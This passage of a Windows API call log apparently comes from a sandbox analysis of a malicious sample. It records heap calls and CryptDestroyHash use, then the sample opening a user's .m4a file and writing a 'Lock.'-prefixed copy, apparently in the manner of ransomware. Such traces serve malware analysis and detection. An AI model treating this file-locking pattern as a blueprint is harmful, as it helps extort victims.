| out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0198.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.678] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.679] CryptDestroyHash (hHash=0xaa5660) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.681] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0198.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.685] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/f_H3Kw_rw4T-WXKpM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f_h3kw_rw4t-wxkpm.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0198.686] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.686] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0198.686] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.686] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.686] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.f_H3Kw_rw4T-WXKpM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.f_h3kw_rw4t-wxkpm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0198.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.688] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0198.688] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0198.690] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x34a3, lpOverlapped=0x0) returned 1 [0198.690] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0198.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0198.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.691] RtlAllocateHeap 